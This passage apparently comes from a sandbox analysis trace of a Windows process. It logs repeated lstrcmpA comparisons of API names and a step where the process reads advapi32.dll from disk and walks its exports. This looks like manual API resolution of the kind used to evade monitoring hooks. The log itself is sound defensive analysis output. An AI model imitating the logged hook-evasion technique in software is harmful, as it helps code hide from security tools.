(lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0278.032] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0278.033] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0278.033] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0278.034] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0278.034] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.140] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0278.141] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0278.142] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0278.142] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0278.142] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0278.142] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.142] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0278.142] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0278.143] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0278.143] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0278.143] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0278.143] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0278.144] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0278.145] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0278.146] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0278.146] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0278.146] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0278.147] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0278.164] GetProcessHeap () returned 0x540000 [0278.165] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x4102040 | out: hHeap=0x540000) returned 1 [0278.281] GetProcessHeap () returned 0x540000 [0278.281] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559280 [0278.282] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0278.282] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0278.282] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0278.283] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0278.284] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0278.284] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0278.284] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0278.288] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0278.288] GetProcessHeap () returned 0x540000 [0278.288] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa3ef0) returned 0x2d42010 [0278.296] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0278.296] ReadFile (in: hFile=0x140, lpBuffer=0x2d42010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d42010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0278.482] CloseHandle (hObject=0x140) returned 1 [0278.482] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0278.482] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0278.482] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0278.482] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0278.483] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0278.483] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0278.483] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0278.483] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0278.483] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0278.483] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0278.483] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0278.484] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0278.485] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0278.486] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0278.486] lstrcmpA 